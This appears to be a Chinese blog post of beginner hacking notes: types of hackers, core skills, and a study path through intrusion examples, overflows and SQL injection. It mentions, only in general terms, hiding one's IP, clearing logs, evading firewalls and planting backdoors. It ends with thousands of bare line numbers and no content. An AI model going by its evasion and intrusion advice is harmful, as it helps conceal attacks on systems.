满天星
Fork me on GitHub

黑客阅读书籍笔记02

第一部分:初级篇

黑客 养成不是一朝一夕的  朋友门认真学习吧     我的QQ1006999819不会的请教我吧呵呵!!!!!!!!第1章菜鸟密集  高手吴TING误喷!!!!
    第一节、黑客的种类和行为
    以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。
    无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
    很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。
    在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种:
    一、学习技术:
    互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。
    初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
菜菜的鸟    二、伪装自己:
    黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
    伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
    如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。
    三、发现漏洞:
    漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。
    黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
    四、利用漏洞:
    对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情:
    1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统;
    2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器;
    3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统;
    4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情;
    5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感!
    第二节、黑客应掌握的基本技能
    从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
    一、了解一定量的英文:
    学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。
    二、学会基本软件的使用:
    这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。
    三、初步了解网络协议和工作原理:
    所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
    四、熟悉几种流行的编程语言和脚本:
    同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
    五、熟悉网络应用程序:
    网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果!
    第2章
    我虽然是个小菜鸟!但是还是要劝告刚刚接触网络的人
    1,不要研究QQ,毕竟QQ不是技术,盗了几个号又算什么?程序不是自己编写的,没什么值得骄傲的.
    2,不要研究怎么破解网吧,难道不觉得:一般关于破解网吧的帖子都很少人回复的么?
    3,研究一些系统知识,比如windows什么版本和什么版本有什么区别……
    4,研究组策略,研究注册表,研究CMD,研究ASP,研究PHP,研究JAVA……
    5,经常来BBS闲逛,例如X,黑防……
    6,不要以为扫到**主机的**端口开放就可以利用什么,微软不是傻的!
    7,尽量不要吧时间浪费在暴力破解上,因为机会很渺茫!无路可走时才可以用用。
    8,不要认为黑客就是非法入侵,就是盗QQ,盗帐号。
    9,祖国需要计算机人才,而不需要盗帐号的高手。
    10,不要奢望有什么快速的途径学习技术,欲速则不达!没有丰富的经验是没有办法提高的。
    如果说错什么,大家都可以指出来~!
    对学习技术的一些建议(按顺序去学):
    1,认真看看过去的入侵实例(如IPC入侵,输入法漏洞),这样可以好好研究windows基础。
    2,学好注册表,因为注册表是windows的数据库,windows相关的数据都在那。
    3,多少学些编程,basic都可以,目的是做好基础,了解了解什么是编程。
    4,看看一些溢出工具编写的教程(不是让你去写,而是让你了解溢出的真正原理),明白原理之后自己用虚拟机实践一下溢出。
    5,有了编程的经验后,就可以看看sql注入攻击了,并且要学习怎么使用NBSI.
    学好了这些,基本上就算入门了,想真正提高,只有努力学好编程,不要认为编程离我们很远……也许你会认为用别人的工具也不错,但是不会编程,就永远发现不了windows的系统漏洞,老是使用公布过的漏洞利用程序,想提高还真难啊.
    再给一个建议........做一个虚拟机,独立安装一个2000的系统(版本越老越好),然后尽量完善那个系统,看看自己能不能成功入侵(这是积累经验的办法).
    这篇帖子没有知识,只是一个方向.学技术需要时间,心急是万万不可Di
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
1311
1312
1313
1314
1315
1316
1317
1318
1319
1320
1321
1322
1323
1324
1325
1326
1327
1328
1329
1330
1331
1332
1333
1334
1335
1336
1337
1338
1339
1340
1341
1342
1343
1344
1345
1346
1347
1348
1349
1350
1351
1352
1353
1354
1355
1356
1357
1358
1359
1360
1361
1362
1363
1364
1365
1366
1367
1368
1369
1370
1371
1372
1373
1374
1375
1376
1377
1378
1379
1380
1381
1382
1383
1384
1385
1386
1387
1388
1389
1390
1391
1392
1393
1394
1395
1396
1397
1398
1399
1400
1401
1402
1403
1404
1405
1406
1407
1408
1409
1410
1411
1412
1413
1414
1415
1416
1417
1418
1419
1420
1421
1422
1423
1424
1425
1426
1427
1428
1429
1430
1431
1432
1433
1434
1435
1436
1437
1438
1439
1440
1441
1442
1443
1444
1445
1446
1447
1448
1449
1450
1451
1452
1453
1454
1455
1456
1457
1458
1459
1460
1461
1462
1463
1464
1465
1466
1467
1468
1469
1470
1471
1472
1473
1474
1475
1476
1477
1478
1479
1480
1481
1482
1483
1484
1485
1486
1487
1488
1489
1490
1491
1492
1493
1494
1495
1496
1497
1498
1499
1500
1501
1502
1503
1504
1505
1506
1507
1508
1509
1510
1511
1512
1513
1514
1515
1516
1517
1518
1519
1520
1521
1522
1523
1524
1525
1526
1527
1528
1529
1530
1531
1532
1533
1534
1535
1536
1537
1538
1539
1540
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
1577
1578
1579
1580
1581
1582
1583
1584
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599
1600
1601
1602
1603
1604
1605
1606
1607
1608
1609
1610
1611
1612
1613
1614
1615
1616
1617
1618
1619
1620
1621
1622
1623
1624
1625
1626
1627
1628
1629
1630
1631
1632
1633
1634
1635
1636
1637
1638
1639
1640
1641
1642
1643
1644
1645
1646
1647
1648
1649
1650
1651
1652
1653
1654
1655
1656
1657
1658
1659
1660
1661
1662
1663
1664
1665
1666
1667
1668
1669
1670
1671
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682
1683
1684
1685
1686
1687
1688
1689
1690
1691
1692
1693
1694
1695
1696
1697
1698
1699
1700
1701
1702
1703
1704
1705
1706
1707
1708
1709
1710
1711
1712
1713
1714
1715
1716
1717
1718
1719
1720
1721
1722
1723
1724
1725
1726
1727
1728
1729
1730
1731
1732
1733
1734
1735
1736
1737
1738
1739
1740
1741
1742
1743
1744
1745
1746
1747
1748
1749
1750
1751
1752
1753
1754
1755
1756
1757
1758
1759
1760
1761
1762
1763
1764
1765
1766
1767
1768
1769
1770
1771
1772
1773
1774
1775
1776
1777
1778
1779
1780
1781
1782
1783
1784
1785
1786
1787
1788
1789
1790
1791
1792
1793
1794
1795
1796
1797
1798
1799
1800
1801
1802
1803
1804
1805
1806
1807
1808
1809
1810
1811
1812
1813
1814
1815
1816
1817
1818
1819
1820
1821
1822
1823
1824
1825
1826
1827
1828
1829
1830
1831
1832
1833
1834
1835
1836
1837
1838
1839
1840
1841
1842
1843
1844
1845
1846
1847
1848
1849
1850
1851
1852
1853
1854
1855
1856
1857
1858
1859
1860
1861
1862
1863
1864
1865
1866
1867
1868
1869
1870
1871
1872
1873
1874
1875
1876
1877
1878
1879
1880
1881
1882
1883
1884
1885
1886
1887
1888
1889
1890
1891
1892
1893
1894
1895
1896
1897
1898
1899
1900
1901
1902
1903
1904
1905
1906
1907
1908
1909
1910
1911
1912
1913
1914
1915
1916
1917
1918
1919
1920
1921
1922
1923
1924
1925
1926
1927
1928
1929
1930
1931
1932
1933
1934
1935
1936
1937
1938
1939
1940
1941
1942
1943
1944
1945
1946
1947
1948
1949
1950
1951
1952
1953
1954
1955
1956
1957
1958
1959
1960
1961
1962
1963
1964
1965
1966
1967
1968
1969
1970
1971
1972
1973
1974
1975
1976
1977
1978
1979
1980
1981
1982
1983
1984
1985
1986
1987
1988
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
2023
2024
2025
2026
2027
2028
2029
2030
2031
2032
2033
2034
2035
2036
2037
2038
2039
2040
2041
2042
2043
2044
2045
2046
2047
2048
2049
2050
2051
2052
2053
2054
2055
2056
2057
2058
2059
2060
2061
2062
2063
2064
2065
2066
2067
2068
2069
2070
2071
2072
2073
2074
2075
2076
2077
2078
2079
2080
2081
2082
2083
2084
2085
2086
2087
2088
2089
2090
2091
2092
2093
2094
2095
2096
2097
2098
2099
2100
2101
2102
2103
2104
2105
2106
2107
2108
2109
2110
2111
2112
2113
2114
2115
2116
2117
2118
2119
2120
2121
2122
2123
2124
2125
2126
2127
2128
2129
2130
2131
2132
2133
2134
2135
2136
2137
2138
2139
2140
2141
2142
2143
2144
2145
2146
2147
2148
2149
2150
2151
2152
2153
2154
2155
2156
2157
2158
2159
2160
2161
2162
2163
2164
2165
2166
2167
2168
2169
2170
2171
2172
2173
2174
2175
2176
2177
2178
2179
2180
2181
2182
2183
2184
2185
2186
2187
2188
2189
2190
2191
2192
2193
2194
2195
2196
2197
2198
2199
2200
2201
2202
2203
2204
2205
2206
2207
2208
2209
2210
2211
2212
2213
2214
2215
2216
2217
2218
2219
2220
2221
2222
2223
2224
2225
2226
2227
2228
2229
2230
2231
2232
2233
2234
2235
2236
2237
2238
2239
2240
2241
2242
2243
2244
2245
2246
2247
2248
2249
2250
2251
2252
2253
2254
2255
2256
2257
2258
2259
2260
2261
2262
2263
2264
2265
2266
2267
2268
2269
2270
2271
2272
2273
2274
2275
2276
2277
2278
2279
2280
2281
2282
2283
2284
2285
2286
2287
2288
2289
2290
2291
2292
2293
2294
2295
2296
2297
2298
2299
2300
2301
2302
2303
2304
2305
2306
2307
2308
2309
2310
2311
2312
2313
2314
2315
2316
2317
2318
2319
2320
2321
2322
2323
2324
2325
2326
2327
2328
2329
2330
2331
2332
2333
2334
2335
2336
2337
2338
2339
2340
2341
2342
2343
2344
2345
2346
2347
2348
2349
2350
2351
2352
2353
2354
2355
2356
2357
2358
2359
2360
2361
2362
2363
2364
2365
2366
2367
2368
2369
2370
2371
2372
2373
2374
2375
2376
2377
2378
2379
2380
2381
2382
2383
2384
2385
2386
2387
2388
2389
2390
2391
2392
2393
2394
2395
2396
2397
2398
2399
2400
2401
2402
2403
2404
2405
2406
2407
2408
2409
2410
2411
2412
2413
2414
2415
2416
2417
2418
2419
2420
2421
2422
2423
2424
2425
2426
2427
2428
2429
2430
2431
2432
2433
2434
2435
2436
2437
2438
2439
2440
2441
2442
2443
2444
2445
2446
2447
2448
2449
2450
2451
2452
2453
2454
2455
2456
2457
2458
2459
2460
2461
2462
2463
2464
2465
2466
2467
2468
2469
2470
2471
2472
2473
2474
2475
2476
2477
2478
2479
2480
2481
2482
2483
2484
2485
2486
2487
2488
2489
2490
2491
2492
2493
2494
2495
2496
2497
2498
2499
2500
2501
2502
2503
2504
2505
2506
2507
2508
2509
2510
2511
2512
2513
2514
2515
2516
2517
2518
2519
2520
2521
2522
2523
2524
2525
2526
2527
2528
2529
2530
2531
2532
2533
2534
2535
2536
2537
2538
2539
2540
2541
2542
2543
2544
2545
2546
2547
2548
2549
2550
2551
2552
2553
2554
2555
2556
2557
2558
2559
2560
2561
2562
2563
2564
2565
2566
2567
2568
2569
2570
2571
2572
2573
2574
2575
2576
2577
2578
2579
2580
2581
2582
2583
2584
2585
2586
2587
2588
2589
2590
2591
2592
2593
2594
2595
2596
2597
2598
2599
2600
2601
2602
2603
2604
2605
2606
2607
2608
2609
2610
2611
2612
2613
2614
2615
2616
2617
2618
2619
2620
2621
2622
2623
2624
2625
2626
2627
2628
2629
2630
2631
2632
2633
2634
2635
2636
2637
2638
2639
2640
2641
2642
2643
2644
2645
2646
2647
2648
2649
2650
2651
2652
2653
2654
2655
2656
2657
2658
2659
2660
2661
2662
2663
2664
2665
2666
2667
2668
2669
2670
2671
2672
2673
2674
2675
2676
2677
2678
2679
2680
2681
2682
2683
2684
2685
2686
2687
2688
2689
2690
2691
2692
2693
2694
2695
2696
2697
2698
2699
2700
2701
2702
2703
2704
2705
2706
2707
2708
2709
2710
2711
2712
2713
2714
2715
2716
2717
2718
2719
2720
2721
2722
2723
2724
2725
2726
2727
2728
2729
2730
2731
2732
2733
2734
2735
2736
2737
2738
2739
2740
2741
2742
2743
2744
2745
2746
2747
2748
2749
2750
2751
2752
2753
2754
2755
2756
2757
2758
2759
2760
2761
2762
2763
2764
2765
2766
2767
2768
2769
2770
2771
2772
2773
2774
2775
2776
2777
2778
2779
2780
2781
2782
2783
2784
2785
2786
2787
2788
2789
2790
2791
2792
2793
2794
2795
2796
2797
2798
2799
2800
2801
2802
2803
2804
2805
2806
2807
2808
2809
2810
2811
2812
2813
2814
2815
2816
2817
2818
2819
2820
2821
2822
2823
2824
2825
2826
2827
2828
2829
2830
2831
2832
2833
2834
2835
2836
2837
2838
2839
2840
2841
2842
2843
2844
2845
2846
2847
2848
2849
2850
2851
2852
2853
2854
2855
2856
2857
2858
2859
2860
2861
2862
2863
2864
2865
2866
2867
2868
2869
2870
2871
2872
2873
2874
2875
2876
2877
2878
2879
2880
2881
2882
2883
2884
2885
2886
2887
2888
2889
2890
2891
2892
2893
2894
2895
2896
2897
2898
2899
2900
2901
2902
2903
2904
2905
2906
2907
2908
2909
2910
2911
2912
2913
2914
2915
2916
2917
2918
2919
2920
2921
2922
2923
2924
2925
2926
2927
2928
2929
2930
2931
2932
2933
2934
2935
2936
2937
2938
2939
2940
2941
2942
2943
2944
2945
2946
2947
2948
2949
2950
2951
2952
2953
2954
2955
2956
2957
2958
2959
2960
2961
2962
2963
2964
2965
2966
2967
2968
2969
2970
2971
2972
2973
2974
2975
2976
2977
2978
2979
2980
2981
2982
2983
2984
2985
2986
2987
2988
2989
2990
2991
2992
2993
2994
2995
2996
2997
2998
2999
3000
3001
3002
3003
3004
3005
3006
3007
3008
3009
3010
3011
3012
3013
3014
3015
3016
3017
3018
3019
3020
3021
3022
3023
3024
3025
3026
3027
3028
3029
3030
3031
3032
3033
3034
3035
3036
3037
3038
3039
3040
3041
3042
3043
3044
3045
3046
3047
3048
3049
3050
3051
3052
3053
3054
3055
3056
3057
3058
3059
3060
3061
3062
3063
3064
3065
3066
3067
3068
3069
3070
3071
3072
3073
3074
3075
3076
3077
3078
3079
3080
3081
3082
3083
3084
3085
3086
3087
3088
3089
3090
3091
3092
3093
3094
3095
3096
3097
3098
3099
3100
3101
3102
3103
3104
3105
3106
3107
3108
3109
3110
3111
3112
3113
3114
3115
3116
3117
3118
3119
3120
3121
3122
3123
3124
3125
3126
3127
3128
3129
3130
3131
3132
3133
3134
3135
3136
3137
3138
3139
3140
3141
3142
3143
3144
3145
3146
3147
3148
3149
3150
3151
3152
3153
3154
3155
3156
3157
3158
3159
3160
3161
3162
3163
3164
3165
3166
3167
3168
3169
3170
3171
3172
3173
3174
3175
3176
3177
3178
3179
3180
3181
3182
3183
3184
3185
3186
3187
3188
3189
3190
3191
3192
3193
3194
3195
3196
3197
3198
3199
3200
3201
3202
3203
3204
3205
3206
3207
3208
3209
3210
3211
3212
3213
3214
3215
3216
3217
3218
3219
3220
3221
3222
3223
3224
3225
3226
3227
3228
3229
3230
3231
3232
3233
3234
3235
3236
3237
3238
3239
3240
3241
3242
3243
3244
3245
3246
3247
3248
3249
3250
3251
3252
3253
3254
3255
3256
3257
3258
3259
3260
3261
3262
3263
3264
3265
3266
3267
3268
3269
3270
3271
3272
3273
3274
3275
3276
3277
3278
3279
3280
3281
3282
3283
3284
3285
3286
3287
3288
3289
3290
3291
3292
3293
3294
3295
3296
3297
3298
3299
3300
3301
3302
3303
3304
3305
3306
3307
3308
3309
3310
3311
3312
3313
3314
3315
3316
3317
3318
3319
3320
3321
3322
3323
3324
3325
3326
3327
3328
3329
3330
3331
3332
3333
3334
3335
3336
3337
3338
3339
3340
3341
3342
3343
3344
3345
3346
3347
3348
3349
3350
3351
3352
3353
3354
3355
3356
3357
3358
3359
3360
3361
3362
3363
3364
3365
3366
3367
3368
3369
3370
3371
3372
3373
3374
3375
3376
3377
3378
3379
3380
3381
3382
3383
3384
3385
3386
3387
3388
3389
3390
3391
3392
3393
3394
3395
3396
3397
3398
3399
3400
3401
3402
3403
3404
3405
3406
3407
3408
3409
3410
3411
3412
3413
3414
3415
3416
3417
3418
3419
3420
3421
3422
3423
3424
3425
3426
3427
3428
3429
3430
3431
3432
3433
3434
3435
3436
3437
3438
3439
3440
3441
3442
3443
3444
3445
3446
3447
3448
3449
3450
3451
3452
3453
3454
3455
3456
3457
3458
3459
3460
3461
3462
3463
3464
3465
3466
3467
3468
3469
3470
3471
3472
3473
3474
3475
3476
3477
3478
3479
3480
3481
3482
3483
3484
3485
3486
3487
3488
3489
3490
3491
3492
3493
3494
3495
3496
3497
3498
3499
3500
3501
3502
3503
3504
3505
3506
3507
3508
3509
3510
3511
3512
3513
3514
3515
3516
3517
3518
3519
3520
3521
3522
3523
3524
3525
3526
3527
3528
3529
3530
3531
3532
3533
3534
3535
3536
3537
3538
3539
3540
3541
3542
3543
3544
3545
3546
3547
3548
3549
3550
3551
3552
3553
3554
3555
3556
3557
3558
3559
3560
3561
3562
3563
3564
3565
3566
3567
3568
3569
3570
3571
3572
3573
3574
3575
3576
3577
3578
3579
3580
3581
3582
3583
3584
3585
3586
3587
3588
3589
3590
3591
3592
3593
3594
3595
3596
3597
3598
3599
3600
3601
3602
3603
3604
3605
3606
3607
3608
3609
3610
3611
3612
3613
3614
3615
3616
3617
3618
3619
3620
3621
3622
3623
3624
3625
3626
3627
3628
3629
3630
3631
3632
3633
3634
3635
3636
3637
3638
3639
3640
3641
3642
3643
3644
3645
3646
3647
3648
3649
3650
3651
3652
3653
3654
3655
3656
3657
3658
3659
3660
3661
3662
3663
3664
3665
3666
3667
3668
3669
3670
3671
3672
3673
3674
3675
3676
3677
3678
3679
3680
3681
3682
3683
3684
3685
3686
3687
3688
3689
3690
3691
3692
3693
3694
3695
3696
3697
3698
3699
3700
3701
3702
3703
3704
3705
3706
3707
3708
3709
3710
3711
3712
3713
3714
3715
3716
3717
3718
3719
3720
3721
3722
3723
3724
3725
3726
3727
3728
3729
3730
3731
3732
3733
3734
3735
3736
3737
3738
3739
3740
3741
3742
3743
3744
3745
3746
3747
3748
3749
3750
3751
3752
3753
3754
3755
3756
3757
3758
3759
3760
3761
3762
3763
3764
3765
3766
3767
3768
3769
3770
3771
3772
3773
3774
3775
3776
3777
3778
3779
3780
3781
3782
3783
3784
3785
3786
3787
3788
3789
3790
3791
3792
3793
3794
3795
3796
3797
3798
3799
3800
3801
3802
3803
3804
3805
3806
3807
3808
3809
3810
3811
3812
3813
3814
3815
3816
3817
3818
3819
3820
3821
3822
3823
3824
3825
3826
3827
3828
3829
3830
3831
3832
3833
3834
3835
3836
3837
3838
3839
3840
3841
3842
3843
3844
3845
3846
3847
3848
3849
3850
3851
3852
3853
3854
3855
3856
3857
3858
3859
3860
3861
3862
3863
3864
3865
3866
3867
3868
3869
3870
3871
3872
3873
3874
3875
3876
3877
3878
3879
3880
3881
3882
3883
3884
3885
3886
3887
3888
3889
3890
3891
3892
3893
3894
3895
3896
3897
3898
3899
3900
3901
3902
3903
3904
3905
3906
3907
3908
3909
3910
3911
3912
3913
3914
3915
3916
3917
3918
3919
3920
3921
3922
3923
3924
3925
3926
3927
3928
3929
3930
3931
3932
3933
3934
3935
3936
3937
3938
3939
3940
3941
3942
3943
3944
3945
3946
3947
3948
3949
3950
3951
3952
3953
3954
3955
3956
3957
3958
3959
3960
3961
3962
